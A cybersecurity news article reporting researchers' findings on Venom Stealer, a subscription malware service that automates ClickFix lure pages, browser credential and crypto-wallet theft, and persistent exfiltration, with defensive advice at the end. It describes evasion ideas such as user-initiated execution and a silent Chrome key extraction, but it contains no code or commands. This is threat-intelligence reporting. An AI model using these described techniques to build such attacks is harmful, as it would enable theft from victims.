Venom Stealer MaaS Platform Commoditizes ClickFix Attacks

ENDPOINT SECURITY CYBERATTACKS & DATA BREACHES REMOTE WORKFORCE THREAT INTELLIGENCE NEWS Venom Stealer MaaS Platform Commoditizes ClickFix Attacks A new service on the cybercrime market provides automated capabilities to create persistent information-stealing social engineering attacks. Elizabeth Montalbano,Contributing Writer April 1, 2026 4 Min Read SOURCE: GERRY PEARCE VIA ALAMY STOCK PHOTO Developing ClickFix-style attacks has just gotten much easier, thanks to a newly distributed malware-as-a-service (MaaS) platform that automates every step of the social engineering technique for would-be attackers, researchers have found. A developer operating under the name "VenomStealer" is selling a MaaS platform of the same name on cybercriminal forums and networks, researchers from BlackFog revealed in a report published Tuesday. Venom Stealer allows attackers to create a persistent, multistage pipeline from initial infection to credential theft, cryptocurrency wallet access, and data exfiltration based on the initial ClickFix interaction. "Venom stands out from commodity stealers like Lumma, Vidar, and RedLine because it goes beyond credential harvesting," BlackFog founder and CEO Darren Williams wrote in the report. "It builds ClickFix social engineering directly into the operator panel, automates every step after initial access, and creates a continuous exfiltration pipeline that does not end when the initial payload finishes running." Related:The Forgotten Endpoint: Security Risks of Dormant Devices Touted on cybercriminal forums as "the Apex Predator of Wallet Extraction," the platform is sold on a subscription basis for $250 a month, or $1,800 for lifetime access, according to Williams. There a vetted application process, Telegram-based licensing, and a 15% affiliate program for Venom Stealer, which delivers a native C++ binary payload compiled per-operator from the web panel.  Unlike traditional stealers that simply execute once, exfiltrate data, and exit, Venom Stealer continuously scans the system to harvests credentials, session cookies, and browser data; targets cryptocurrency wallets and stored secrets; and automates wallet cracking and fund draining, according to BlackFog's report. Moreover, despite its relatively new presence on the commodity MaaS market, the operation behind Venom Stealer already appears to be a thriving business, Williams noted. So far in the month of March alone, its developer has already shipped multiple updates to the platform. Step-By-Step ClickFix by Design An attack built with Venom Stealer begins when a prospective victim lands on a ClickFix page hosted by the operator. The platform ships four templates per platform (Windows and macOS), a fake Cloudflare CAPTCHA, a fake OS update, a fake SSL certificate error, and a fake font install page. Each one asks the target to open a Run dialog or Terminal, copy and paste a command, and hit Enter. "Because the target initiates execution themselves, the process appears user-initiated and bypasses detection logic built around parent-child process relationships," Williams explained.  Related:Coruna, DarkSword & Democratizing Nation-State Exploit Kits Windows payloads available in the kit include .exe, .psi (or fileless via PowerShell), .hta, and .bat options, while macOS templates use bash and curl, he said. The platform also gives operators the capability to configure custom domains through Cloudflare DNS, so the panel URL never appears in the command. Once the payload executes, it sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile. Moreover, there are evasion capabilities built into the execution mode, with the password encryption in versions 10 and 20 of Chrome bypassed using a silent privilege escalation that extracts the decryption key without triggering any user account control (UAC) dialog, thus leaving no forensic artifacts, Williams noted. The attack chain also captures system fingerprinting and browser extension inventories alongside the credentials, giving cybercriminals a complete profile of each target, he added. "All of this data leaves the infected device immediately, with little or no local staging or delay," Williams wrote. "Without adequate visibility into outbound traffic, detecting this activity becomes significantly more difficult." Related:Is the FCC's Router Ban the Wrong Fix? Persistent Data-Theft Pipeline The attack transfers any discovered wallet data to a server-side, GPU-powered cracking engine that auto-cracks crypto wallets such as MetaMask, Phantom, Solflare, Trust Wallet, Atomic, Exodus, Electrum, Bitcoin Core, Monero, and Tonkeeper. Additionally, a March 9 update to Venom Stealer also added a File Password and Seed Finder, which search the filesystem for locally saved seed phrases, feeding anything found into the cracking pipeline.  "Even targets who avoid saving credentials in their browser are at risk if seed phrases exist anywhere on the machine," Williams wrote. And while some newer infostealer variants do have some persistence capability, Venom goes further than them all by staying active after the initial compromise and continuously monitoring Chrome’s Login Data, capturing newly saved credentials in real-time, he added. "This undermines credential rotation as an incident response measure and extends the exfiltration window beyond the initial infection," Williams observed. "As a result, determining the full scope of the ongoing compromise becomes more difficult." How to Reduce ClickFix Exposure Researchers from ProofPoint first spotted ClickFix attacks about two years ago, and the technique has taken off with the cybercriminal community since then. The attack instills urgency among targets by telling them something is wrong that they must fix or update, and then uses otherwise benign CAPTCHA-style prompts to lure them into a false sense of security. The aim is to trick a user into executing malicious prompts against themselves.  Organizations can reduce exposure to threats like Venom Stealer by restricting PowerShell execution, disabling the Run dialog for standard users via Group Policy, and training employees to recognize ClickFix-style social engineering, Williams advised. "Once the payload is running, the attack chain depends on data leaving the device," he wrote. "Monitoring and controlling outbound traffic become important at this point, because it provides an opportunity to detect or prevent exfiltration activity and limit the impact of credential theft and subsequent actions." About the Author Elizabeth Montalbano Contributing Writer Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking. Want more Dark Reading stories in your Google search results? ADD US NOW More Insights Industry Reports Frost Radar™: Non-human Identity Solutions 2026 CISO AI Risk Report Cybersecurity Forecast 2026 The ROI of AI in Security ThreatLabz 2025 Ransomware Report Access More Research Webinars Building a Robust SOC in a Post-AI World Retail Security: Protecting Customer Data and Payment Systems Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need Securing Remote and Hybrid Work Forecast: Beyond the VPN AI-Powered Threat Detection: Beyond Traditional Security Models More Webinars You May Also Like ENDPOINT SECURITY Cisco VPNs, Email Services Hit in Separate Threat Campaigns by Nate Nelson, Contributing Writer DEC 19, 2025 ENDPOINT SECURITY We've All Been Wrong: Phishing Training Doesn't Work by Nate Nelson, Contributing Writer JUL 01, 2025 ENDPOINT SECURITY Attackers Lace Fake GenAI Tools With Malware by Alexander Culafi, Senior News Writer, Dark Reading MAY 12, 2025 CYBERATTACKS & DATA BREACHES DeepSeek Breach Opens Floodgates to Dark Web by Emma Zaballos APR 22, 2025 Editor's Choice CYBERSECURITY OPERATIONS Why Stryker's Outage Is a Disaster Recovery Wake-Up Call byJai Vijayan MAR 12, 2026 5 MIN READ CYBER RISK What Orgs Can Learn From Olympics, World Cup IR Plans byTara Seals MAR 12, 2026 THREAT INTELLIGENCE Commercial Spyware Opponents Fear US Policy Shifting byRob Wright MAR 12, 2026 9 MIN READ Want more Dark Reading stories in your Google search results? 2026 Security Trends & Outlooks THREAT INTELLIGENCE Cybersecurity Predictions for 2026: Navigating the Future of Digital Threats JAN 2, 2026 CYBER RISK Navigating Privacy and Cybersecurity Laws in 2026 Will Prove Difficult JAN 12, 2026 ENDPOINT SECURITY CISOs Face a Tighter Insurance Market in 2026 JAN 5, 2026 THREAT INTELLIGENCE 2026: The Year Agentic AI Becomes the Attack-Surface Poster Child JAN 30, 2026 Download the Collection Keep up with the latest cybersecurity threats, newly discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox. SUBSCRIBE Webinars Building a Robust SOC in a Post-AI World THURS, MARCH 19, 2026 AT 1PM EST Retail Security: Protecting Customer Data and Payment Systems THURS, APRIL 2, 2026 AT 1PM EST Rethinking SSE: When Unified SASE Delivers the Flexibility Enterprises Need WED, APRIL 1, 2026 AT 1PM EST Securing Remote and Hybrid Work Forecast: Beyond the VPN TUES, MARCH 10, 2026 AT 1PM EST AI-Powered Threat Detection: Beyond Traditional Security Models WED, MARCH 25, 2026 AT 1PM EST More Webinars White Papers Autonomous Pentesting at Machine Speed, Without False Positives Fixing Organizations' Identity Security Posture Best practices for incident response planning Industry Report: AI, SOC, and Modernizing Cybersecurity The Threat Prevention Buyer's Guide: Find the best AI-driven threat protection solution to stop file-based attacks. Explore More White Papers BLACK HAT ASIA | MARINA BAY SANDS, SINGAPORE Experience cutting-edge cybersecurity insights in this four-day event featuring expert Briefings on the latest research, Arsenal tool demos, a vibrant Business Hall, networking opportunities, and more. Use code DARKREADING for a Free Business Pass or $200 off a Briefings Pass. GET YOUR PASS GISEC GLOBAL 2026 GISEC GLOBAL is the most influential and the largest cybersecurity gathering in the Middle East & Africa, uniting global CISOs, government leaders, technology buyers, and ethical hackers for three power-packed days of innovation, strategy, and live cyber drills. 📌 BOOK YOUR SPACE